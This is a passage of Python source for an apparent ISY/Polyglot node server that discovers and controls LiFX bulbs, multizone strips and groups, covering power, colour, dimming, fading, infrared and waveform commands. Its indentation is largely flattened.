LOGGER.info('Found LiFX Group: {}'.format(glabel))
grp = lifxlan.Group(members)
self.addNode(Group(self, self.address, gaddress, glabel, grp), update = self.update_nodes)
return True
def _discovery_process(self):
LOGGER.info('Starting LiFX Discovery thread...')
if 'devlist' in self.polyConfig['customParams']:
LOGGER.info('Attempting manual discovery...')
if self._manual_discovery():
LOGGER.info('Manual discovery is complete')
return
else:
LOGGER.error('Manual discovery failed')
try:
devices = self.lifxLan.get_lights()
LOGGER.info('{} bulbs found. Checking status and adding to ISY if necessary.'.format(len(devices)))
for d in devices:
label = str(d.get_label())
name = 'LIFX {}'.format(label)
address = d.get_mac_addr().replace(':', '').lower()
if not address in self.nodes:
self.bulbs_found += 1
if d.supports_multizone():
LOGGER.info('Found MultiZone Bulb: {}({})'.format(name, address))
self.addNode(MultiZone(self, self.address, address, name, d), update = self.update_nodes)
else:
LOGGER.info('Found Bulb: {}({})'.format(name, address))
self.addNode(Light(self, self.address, address, name, d), update = self.update_nodes)
gid, glabel, gupdatedat = d.get_group_tuple()
gaddress = glabel.replace("'", "").replace(' ', '').lower()[:12]
if not gaddress in self.nodes:
LOGGER.info('Found LiFX Group: {}'.format(glabel))
self.addNode(Group(self, self.address, gaddress, glabel), update = self.update_nodes)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('discovery Error: {}'.format(ex))
self.update_nodes = False
try:
old_bulbs_found = int(self.getDriver('GV0'))
        except Exception:
old_bulbs_found = self.bulbs_found
else:
if self.bulbs_found != old_bulbs_found:
LOGGER.info('NOTICE: Bulb count {} is different, was {} previously'.format(self.bulbs_found, old_bulbs_found))
self.setDriver('GV0', self.bulbs_found)
LOGGER.info('LiFX Discovery thread is complete.')
def all_on(self, command):
try:
self.lifxLan.set_power_all_lights("on", rapid=True)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('All On Error: {}'.format(str(ex)))
def all_off(self, command):
try:
self.lifxLan.set_power_all_lights("off", rapid=True)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('All Off Error: {}'.format(str(ex)))
def set_wf(self, command):
WAVEFORM = ['Saw', 'Sine', 'HalfSine', 'Triangle', 'Pulse']
query = command.get('query')
wf_color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
wf_period = int(query.get('PE.uom42'))
wf_cycles = int(query.get('CY.uom56'))
wf_duty_cycle = int(query.get('DC.uom56'))
wf_form = int(query.get('WF.uom25'))
if wf_form >= 5:
wf_transient = 1
wf_form -= 5
else:
wf_transient = 0
LOGGER.debug('Color tuple: {}, Period: {}, Cycles: {}, Duty cycle: {}, Form: {}, Transient: {}'.format(wf_color, wf_period, wf_cycles, wf_duty_cycle, WAVEFORM[wf_form], wf_transient))
try:
self.lifxLan.set_waveform_all_lights(wf_transient, wf_color, wf_period, wf_cycles, wf_duty_cycle, wf_form)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting Waveform for all lights: {}'.format(str(ex)))
def setColor(self, command):
_color = int(command.get('value'))
try:
self.lifxLan.set_color_all_lights(COLORS[_color][1], rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting all bulb color: {}'.format(str(ex)))
def setHSBKD(self, command):
query = command.get('query')
try:
color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
duration = int(query.get('D.uom42'))
LOGGER.info('Received manual change, updating all bulb to: {} duration: {}'.format(str(color), duration))
except TypeError:
duration = 0
try:
self.lifxLan.set_color_all_lights(color, duration=duration, rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting all bulb color: {}'.format(str(ex)))
drivers = [{'driver': 'ST', 'value': 1, 'uom': 2},
{'driver': 'GV0', 'value': 0, 'uom': 56}
]
id = 'controller'
commands = {'DISCOVER': discover, 'DON': all_on, 'DOF': all_off,
'SET_COLOR': setColor, 'SET_HSBKD': setHSBKD, 'WAVEFORM': set_wf
}
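# --- Illustrative sketch (not part of the original node server) ---
# Controller.set_wf() above and Light.set_wf() below encode the ISY "WF" value
# so that 0-4 select a waveform directly and 5-9 select the same waveform with
# the transient flag set. This hypothetical helper restates that decoding.
def _decode_waveform_selector(wf_value):
    """Return (transient, waveform_index) for a combined 0-9 ISY WF value."""
    if wf_value >= 5:
        return 1, wf_value - 5
    return 0, wf_value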
class Light(polyinterface.Node):
"""
LiFX Light Parent Class
"""
def __init__(self, controller, primary, address, name, dev):
super().__init__(controller, primary, address, name)
self.device = dev
self.name = name
self.power = False
self.connected = 1
self.uptime = 0
        self.color = []
self.lastupdate = time.time()
self.duration = 0
def start(self):
try:
self.duration = int(self.getDriver('RR'))
        except Exception:
self.duration = 0
self.update()
self.long_update()
def query(self, command = None):
self.update()
self.long_update()
self.reportDrivers()
def update(self):
connected = 0
try:
self.color = list(self.device.get_color())
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
try:
power_now = True if self.device.get_power() == 65535 else False
if self.power != power_now:
if power_now:
self.reportCmd('DON')
else:
self.reportCmd('DOF')
self.power = power_now
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
if self.power:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
else:
self.setDriver('ST', 0)
self.connected = connected
self.setDriver('GV5', self.connected)
self.setDriver('RR', self.duration)
self.lastupdate = time.time()
def long_update(self):
connected = 0
try:
self.uptime = self._nanosec_to_hours(self.device.get_uptime())
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb uptime. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.setDriver('GV6', self.uptime)
if self.device.supports_infrared():
try:
ir_brightness = self.device.get_infrared()
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb Infrared. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.setDriver('GV7', ir_brightness)
else:
self.setDriver('GV7', 0)
try:
wifi_signal = math.floor(10 * math.log10(self.device.get_wifi_signal_mw()) + 0.5)
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb WiFi signal strength. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.setDriver('GV0', wifi_signal)
self.connected = connected
self.setDriver('GV5', self.connected)
self.lastupdate = time.time()
def _nanosec_to_hours(self, ns):
return int(round(ns/(1000000000.0*60*60)))
def _bri_to_percent(self, bri):
return float(round(bri*100/65535, 4))
def _power_on_change(self):
if not self.controller.change_pon or self.power:
return
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
def setOn(self, command):
cmd = command.get('cmd')
val = command.get('value')
new_bri = None
if cmd == 'DFON' and self.color[2] != BR_MAX:
new_bri = BR_MAX
trans = 0
elif cmd == 'DON' and val is not None:
new_bri = int(round(int(val)*65535/255))
if new_bri > BR_MAX:
new_bri = BR_MAX
elif new_bri < BR_MIN:
new_bri = BR_MIN
trans = self.duration
elif self.power and self.controller.ignore_second_on:
LOGGER.info('{} is already On, ignoring DON'.format(self.name))
return
elif self.power and self.color[2] != BR_MAX:
new_bri = BR_MAX
trans = self.duration
if new_bri is not None:
self.color[2] = new_bri
try:
self.device.set_color(self.color, trans, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error DON {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('GV3', self.color[2])
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
def setOff(self, command):
try:
self.device.set_power(False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = False
self.setDriver('ST', 0)
def dim(self, command):
if self.power is False:
            LOGGER.info('{} is off, ignoring DIM'.format(self.name))
            return
new_bri = self.color[2] - BR_INCREMENT
if new_bri < BR_MIN:
new_bri = BR_MIN
self.color[2] = new_bri
try:
self.device.set_color(self.color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
self.setDriver('GV3', self.color[2])
def brighten(self, command):
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
                LOGGER.error('Connection Error on brightening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
return
new_bri = self.color[2] + BR_INCREMENT
if new_bri > BR_MAX:
new_bri = BR_MAX
self.color[2] = new_bri
try:
self.device.set_color(self.color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
self.setDriver('GV3', self.color[2])
def fade_up(self, command):
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
                LOGGER.error('Connection Error on brightening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
if self.color[2] == BR_MAX:
LOGGER.info('{} Can not FadeUp, already at maximum'.format(self.name))
return
self.color[2] = BR_MAX
try:
self.device.set_color(self.color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Up. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_down(self, command):
if self.power is False:
LOGGER.error('{} can not FadeDown as it is currently off'.format(self.name))
return
if self.color[2] <= BR_MIN:
LOGGER.error('{} can not FadeDown as it is currently at minimum'.format(self.name))
return
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Down. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_stop(self, command):
if self.power is False:
LOGGER.error('{} can not FadeStop as it is currently off'.format(self.name))
return
# check current brightness level
try:
self.color = list(self.device.get_color())
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
if self.color[2] == BR_MIN or self.color[2] == BR_MAX:
LOGGER.error('{} can not FadeStop as it is currently at limit'.format(self.name))
return
try:
self.device.set_color(self.color, 0, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Stop. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def setColor(self, command):
if self.connected:
_color = int(command.get('value'))
try:
self.device.set_color(COLORS[_color][1], duration=self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
LOGGER.info('Received SetColor command from ISY. Changing color to: {}'.format(COLORS[_color][0]))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, COLORS[_color][1][ind])
self._power_on_change()
else:
LOGGER.error('Received SetColor, however the bulb is in a disconnected state... ignoring')
def setManual(self, command):
if self.connected:
_cmd = command.get('cmd')
_val = int(command.get('value'))
if _cmd == 'SETH':
self.color[0] = _val
driver = ['GV1', self.color[0]]
elif _cmd == 'SETS':
self.color[1] = _val
driver = ['GV2', self.color[1]]
elif _cmd == 'SETB':
self.color[2] = _val
driver = ['GV3', self.color[2]]
elif _cmd == 'CLITEMP':
self.color[3] = _val
driver = ['CLITEMP', self.color[3]]
elif _cmd == 'RR':
self.duration = _val
driver = ['RR', self.duration]
try:
self.device.set_color(self.color, self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb {}. This happens from time to time, normally safe to ignore. {}'.format(self.name, _cmd, str(ex)))
LOGGER.info('Received manual change, updating the bulb to: {} duration: {}'.format(str(self.color), self.duration))
if driver:
self.setDriver(driver[0], driver[1])
self._power_on_change()
else: LOGGER.info('Received manual change, however the bulb is in a disconnected state... ignoring')
def setHSBKD(self, command):
query = command.get('query')
try:
self.color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
self.duration = int(query.get('D.uom42'))
LOGGER.info('Received manual change, updating the bulb to: {} duration: {}'.format(str(self.color), self.duration))
except TypeError:
self.duration = 0
try:
self.device.set_color(self.color, duration=self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
self._power_on_change()
self.setDriver('RR', self.duration)
def set_ir_brightness(self, command):
_val = int(command.get('value'))
if not self.device.supports_infrared():
LOGGER.error('{} is not IR capable'.format(self.name))
return
try:
self.device.set_infrared(_val)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb IR Brightness. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('GV7', _val)
def set_wf(self, command):
WAVEFORM = ['Saw', 'Sine', 'HalfSine', 'Triangle', 'Pulse']
if self.power is False:
LOGGER.error('{} can not run Waveform as it is currently off'.format(self.name))
return
query = command.get('query')
wf_color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
wf_period = int(query.get('PE.uom42'))
wf_cycles = int(query.get('CY.uom56'))
wf_duty_cycle = int(query.get('DC.uom56'))
wf_form = int(query.get('WF.uom25'))
if wf_form >= 5:
wf_transient = 1
wf_form -= 5
else:
wf_transient = 0
LOGGER.debug('Color tuple: {}, Period: {}, Cycles: {}, Duty cycle: {}, Form: {}, Transient: {}'.format(wf_color, wf_period, wf_cycles, wf_duty_cycle, WAVEFORM[wf_form], wf_transient))
try:
self.device.set_waveform(wf_transient, wf_color, wf_period, wf_cycles, wf_duty_cycle, wf_form)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb Waveform. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
drivers = [{'driver': 'ST', 'value': 0, 'uom': 51},
{'driver': 'GV0', 'value': 0, 'uom': 56},
{'driver': 'GV1', 'value': 0, 'uom': 56},
{'driver': 'GV2', 'value': 0, 'uom': 56},
{'driver': 'GV3', 'value': 0, 'uom': 56},
{'driver': 'CLITEMP', 'value': 0, 'uom': 26},
{'driver': 'GV5', 'value': 0, 'uom': 2},
{'driver': 'GV6', 'value': 0, 'uom': 20},
{'driver': 'GV7', 'value': 0, 'uom': 56},
{'driver': 'RR', 'value': 0, 'uom': 42}]
id = 'lifxcolor'
commands = {
'DON': setOn, 'DOF': setOff, 'QUERY': query,
'SET_COLOR': setColor, 'SETH': setManual,
'SETS': setManual, 'SETB': setManual,
'CLITEMP': setManual,
'RR': setManual, 'SET_HSBKD': setHSBKD,
'BRT': brighten, 'DIM': dim, 'FDUP': fade_up,
'FDDOWN': fade_down, 'FDSTOP': fade_stop,
'DFON': setOn, 'DFOF': setOff,
'SETIR': set_ir_brightness, 'WAVEFORM': set_wf
}
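# --- Illustrative sketch (not part of the original node server) ---
# Throughout the MultiZone class below, the ISY-facing zone selector uses 0 to
# mean "whole device" and 1..num_zones to address a single zone, so the LiFX
# zone index is the selector minus one (the recurring
# "zone = deepcopy(self.current_zone); if self.current_zone != 0: zone -= 1"
# pattern). This hypothetical helper restates that convention.
def _selector_to_zone_index(selector):
    """Return (whole_device, zone_index) for an ISY zone selector value."""
    if selector == 0:
        return True, 0
    return False, selector - 1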
class MultiZone(Light):
def __init__(self, controller, primary, address, name, dev):
super().__init__(controller, primary, address, name, dev)
self.num_zones = 0
self.current_zone = 0
self.new_color = None
self.pending = False
def update(self):
connected = 0
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if not self.pending:
try:
self.color = self.device.get_color_zones()
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} multizone color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.num_zones = len(self.color)
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
try:
self.setDriver(driver, self.color[zone][ind])
except (TypeError) as e:
LOGGER.debug('setDriver for color caught an error. color was : {}'.format(self.color or None))
self.setDriver('GV4', self.current_zone)
try:
power_now = True if self.device.get_power() == 65535 else False
if self.power != power_now:
if power_now:
self.reportCmd('DON')
else:
self.reportCmd('DOF')
self.power = power_now
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} multizone power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self._set_st()
self.connected = connected
self.setDriver('GV5', self.connected)
self.setDriver('RR', self.duration)
self.lastupdate = time.time()
def _set_st(self):
if self.num_zones == 0: return
if self.power:
avg_brightness = 0
for z in self.color:
avg_brightness += z[2]
avg_brightness /= self.num_zones
self.setDriver('ST', self._bri_to_percent(avg_brightness))
else:
self.setDriver('ST', 0)
def start(self):
try:
self.duration = int(self.getDriver('RR'))
        except Exception:
self.duration = 0
try:
self.current_zone = int(self.getDriver('GV4'))
        except Exception:
self.current_zone = 0
self.update()
self.long_update()
def setOn(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
cmd = command.get('cmd')
val = command.get('value')
new_bri = None
if cmd == 'DFON' and self.color[zone][2] != BR_MAX:
new_bri = BR_MAX
trans = 0
elif cmd == 'DON' and val is not None:
new_bri = int(round(int(val)*65535/255))
if new_bri > BR_MAX:
new_bri = BR_MAX
elif new_bri < BR_MIN:
new_bri = BR_MIN
trans = self.duration
elif self.power and self.color[zone][2] != BR_MAX:
new_bri = BR_MAX
trans = self.duration
if new_bri is not None:
new_color = list(self.color[zone])
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, trans, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, trans, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error DON {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('GV3', new_color[2])
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self._set_st()
def dim(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.power is False:
            LOGGER.info('{} is off, ignoring DIM'.format(self.name))
            return
new_bri = self.color[zone][2] - BR_INCREMENT
if new_bri < BR_MIN:
new_bri = BR_MIN
new_color = list(self.color[zone])
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, BRTDIM_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self._set_st()
self.setDriver('GV3', new_color[2])
def brighten(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
                LOGGER.error('Connection Error on brightening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self._set_st()
return
new_bri = self.color[zone][2] + BR_INCREMENT
if new_bri > BR_MAX:
new_bri = BR_MAX
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, BRTDIM_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self._set_st()
self.setDriver('GV3', new_color[2])
def fade_up(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
                LOGGER.error('Connection Error on brightening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self._set_st()
if self.color[zone][2] == BR_MAX:
LOGGER.info('{} Can not FadeUp, already at maximum'.format(self.name))
return
new_color[2] = BR_MAX
try:
if self.current_zone == 0:
self.device.set_color(new_color, FADE_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Up. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_down(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
LOGGER.error('{} can not FadeDown as it is currently off'.format(self.name))
return
if self.color[zone][2] <= BR_MIN:
LOGGER.error('{} can not FadeDown as it is currently at minimum'.format(self.name))
return
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, FADE_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Down. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_stop(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.power is False:
LOGGER.error('{} can not FadeStop as it is currently off'.format(self.name))
return
# check current brightness level
try:
self.color = self.device.get_color_zones()
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} multizone color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[zone][ind])
if self.color[zone][2] == BR_MIN or self.color[zone][2] == BR_MAX:
LOGGER.error('{} can not FadeStop as it is currently at limit'.format(self.name))
return
try:
if self.current_zone == 0:
self.device.set_color(self.color[zone], 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, self.color[zone], 0, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Stop. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def apply(self, command):
try:
if self.new_color:
self.color = deepcopy(self.new_color)
self.new_color = None
self.device.set_zone_colors(self.color, self.duration, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
LOGGER.info('Received apply command for {}'.format(self.address))
self.pending = False
def setColor(self, command):
if self.connected:
try:
_color = int(command.get('value'))
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.current_zone == 0:
self.device.set_color(COLORS[_color][1], self.duration, True)
else:
self.device.set_zone_color(zone, zone, COLORS[_color][1], self.duration, True)
LOGGER.info('Received SetColor command from ISY. Changing {} color to: {}'.format(self.address, COLORS[_color][0]))
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('mz setcolor error {}'.format(str(ex)))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, COLORS[_color][1][ind])
else: LOGGER.info('Received SetColor, however the bulb is in a disconnected state... ignoring')
def setManual(self, command):
if self.connected:
_cmd = command.get('cmd')
_val = int(command.get('value'))
try:
if _cmd == 'SETZ':
self.current_zone = int(_val)
if self.current_zone > self.num_zones: self.current_zone = 0
driver = ['GV4', self.current_zone]
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if _cmd == 'SETH':
new_color[0] = int(_val)
driver = ['GV1', new_color[0]]
elif _cmd == 'SETS':
new_color[1] = int(_val)
driver = ['GV2', new_color[1]]
elif _cmd == 'SETB':
new_color[2] = int(_val)
driver = ['GV3', new_color[2]]
elif _cmd == 'CLITEMP':
new_color[3] = int(_val)
driver = ['CLITEMP', new_color[3]]
elif _cmd == 'RR':
self.duration = _val
driver = ['RR', self.duration]
self.color[zone] = new_color
if self.current_zone == 0:
self.device.set_color(new_color, self.duration, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, self.duration, rapid=False)
except (lifxlan.WorkflowException, TypeError) as ex:
LOGGER.error('setmanual mz error {}'.format(ex))
LOGGER.info('Received manual change, updating the mz bulb zone {} to: {} duration: {}'.format(zone, new_color, self.duration))
if driver:
self.setDriver(driver[0], driver[1])
else: LOGGER.info('Received manual change, however the mz bulb is in a disconnected state... ignoring')
def setHSBKDZ(self, command):
query = command.get('query')
if not self.pending:
self.new_color = deepcopy(self.color)
self.pending = True
current_zone = int(query.get('Z.uom56'))
zone = deepcopy(current_zone)
if current_zone != 0: zone -= 1
self.new_color[zone] = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
try:
self.duration = int(query.get('D.uom42'))
except TypeError:
self.duration = 0
try:
if current_zone == 0:
self.device.set_color(self.new_color, self.duration, rapid=False)
else:
self.device.set_zone_color(zone, zone, self.new_color, self.duration, rapid=False, apply = 0)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('set mz hsbkdz error %s', str(ex))
commands = {
'DON': setOn, 'DOF': Light.setOff,
'APPLY': apply, 'QUERY': Light.query,
'SET_COLOR': setColor, 'SETH': setManual,
'SETS': setManual, 'SETB': setManual,
'CLITEMP': setManual, 'RR': setManual,
'SETZ': setManual, 'SET_HSBKDZ': setHSBKDZ,
'BRT': brighten, 'DIM': dim,
'FDUP': fade_up, 'FDDOWN': fade_down,
'FDSTOP': fade_stop, 'DFON': setOn,
'DFOF': Light.setOff, 'SETIR': Light.set_ir_brightness,
'WAVEFORM': Light.set_wf
}
drivers = [{'driver': 'ST', 'value': 0, 'uom': 51},
{'driver': 'GV0', 'value': 0, 'uom': 56},
{'driver': 'GV1', 'value': 0, 'uom': 56},
{'driver': 'GV2', 'value': 0, 'uom': 56},
{'driver': 'GV3', 'value': 0, 'uom': 56},
{'driver': 'CLITEMP', 'value': 0, 'uom': 26},
{'driver': 'GV4', 'value': 0, 'uom': 56},
{'driver': 'GV5', 'value': 0, 'uom': 2},
{'driver': 'GV6', 'value': 0, 'uom': 20},
{'driver': 'GV7', 'value': 0, 'uom': 56},
{'driver': 'RR', 'value': 0, 'uom': 42}]
id = 'lifxmultizone'
class Group(polyinterface.Node):
"""
LiFX Group Node Class
"""
def __init__(self, controller, primary, address, label, grp=None):
self.label = label.replace("'", "")
super().__init__(controller, primary, address, 'LIFX Group ' + str(label))
self.lifxLabel = label
if grp:
self.lifxGroup = grp
else:
self.lifxGroup = self.controller.lifxLan.get_devices_by_group(label)
self.numMembers = len(self.lifxGroup.devices)
def start(self):
self.update()
#self.reportDrivers()
def update(self):
self.numMembers = len(self.lifxGroup.devices)
self.setDriver('ST', self.numMembers)
def long_update(self):
pass
def query(self, command = None):
self.update()
self.reportDrivers()
def _power_on_change(self):
if not self.controller.change_pon:
return
try:
self.lifxGroup.set_power(True,rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Error on setting {} power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def setOn(self, command):
try:
self.lifxGroup.set_power(True, rapid = True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group seton error caught %s', str(ex))
else:
LOGGER.info('Received SetOn command for group {} from ISY. Setting all {} members to ON.'.format(self.label, self.numMembers))
def setOff(self, command):
try:
self.lifxGroup.set_power(False, rapid = True)
except (lifxlan.WorkflowException, IOError) as e:
LOGGER.error('group setoff error caught {}'.format(str(e)))
else:
